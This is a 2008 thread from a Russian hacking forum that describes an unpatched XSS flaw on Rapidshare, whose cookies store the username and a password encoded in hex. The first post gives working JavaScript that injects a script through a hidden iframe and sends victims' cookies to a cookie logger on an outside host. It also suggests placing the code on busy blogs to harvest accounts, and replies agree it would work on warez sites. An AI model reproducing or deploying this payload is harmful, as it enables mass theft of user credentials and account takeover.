HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > ОФФТОП > Болталка
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

[XSS] Rapidshare
  #1  
Старый 15.07.2008, 18:08
Wh(te
Новичок
Регистрация: 09.06.2008
Сообщений: 4
С нами: 9432175

Репутация: 25
По умолчанию [XSS] Rapidshare

Nktpro любезно сообщил о последней XSS уязвимости на Rapidshare которая до сих пор не закрыта, несмотря на то , что о ней была оповещена администрация файлообменника еще месяц назад пользователями сайта.
Но на что Вы можете расчитывать от людей, которые хранят логин и пароль в cookie?
Да , убедитесь сами: Rapidshare cookie имеют вид: user=12345-%36%37%38%39%30.
В Javascript,
cookie = "username=" + login + "-" + pwd.replace(/./g, function(s) "%" + (s.charCodeAt(0).toString(16)))
Поэтому этих cookie достаточно для получения доступа
var [login, pwd] = cookie.replace(/.*=/,'').split("-"), pwd = unescape(pwd);

Это значит следующее , если включить этот код в сообщение в блоге который посещается множеством пользователей rapidshare , можно получить огромное колличество аккаунтов.


var injection = "<script>(" + (function() {

new Image().src = "http://evil.hackademix.net/cookielogger/rapidshare/?c=" +

escape(document.cookie);

}) + ")()</scr" + "ipt>"

var iframe = document.body.appendChild(document.createElement(" iframe"));

iframe.style.visibility = "hidden";

iframe.src = "http://rapidshare.com/cgi-bin/wiretransfer.cgi?extendaccount=12345%22" +

encodeURIComponent(injection);




15\07\2008 ©http://hackademix.net/

Последний раз редактировалось Wh(te; 15.07.2008 в 19:52..
 
Ответить с цитированием

  #2  
Старый 15.07.2008, 18:15
!JaX!
Познающий
Регистрация: 28.04.2007
Сообщений: 42
С нами: 10020379

Репутация: 42
Отправить сообщение для !JaX! с помощью Yahoo
По умолчанию

Т.е если отписать этот код на варез сайте то мона получить ДоХуЙа акков?
 
Ответить с цитированием

  #3  
Старый 15.07.2008, 18:35
_kREveDKo_
Banned
Регистрация: 04.12.2005
Сообщений: 826
С нами: 10754246

Репутация: 3813


По умолчанию

Угу, можно =)
 
Ответить с цитированием

  #4  
Старый 15.07.2008, 19:04
.Sylar
Познающий
Регистрация: 15.07.2008
Сообщений: 37
С нами: 9380537

Репутация: 37
По умолчанию

Оригинал:
Цитата:
But what can you expect by people who stores both your username and password inside your cookie?
Неправильный вариант перевода:
Цитата:
Но на что могли расчитывать люди , которые хранят логин и пароль в cookie?
Правильный вариант перевода:
Цитата:
Но на что Вы можете расчитывать от людей, которые хранят логин и пароль в cookie?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Rapidshare xss is still unpatched Wh(te Forum for discussion of ANTICHAT 0 15.07.2008 16:59



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.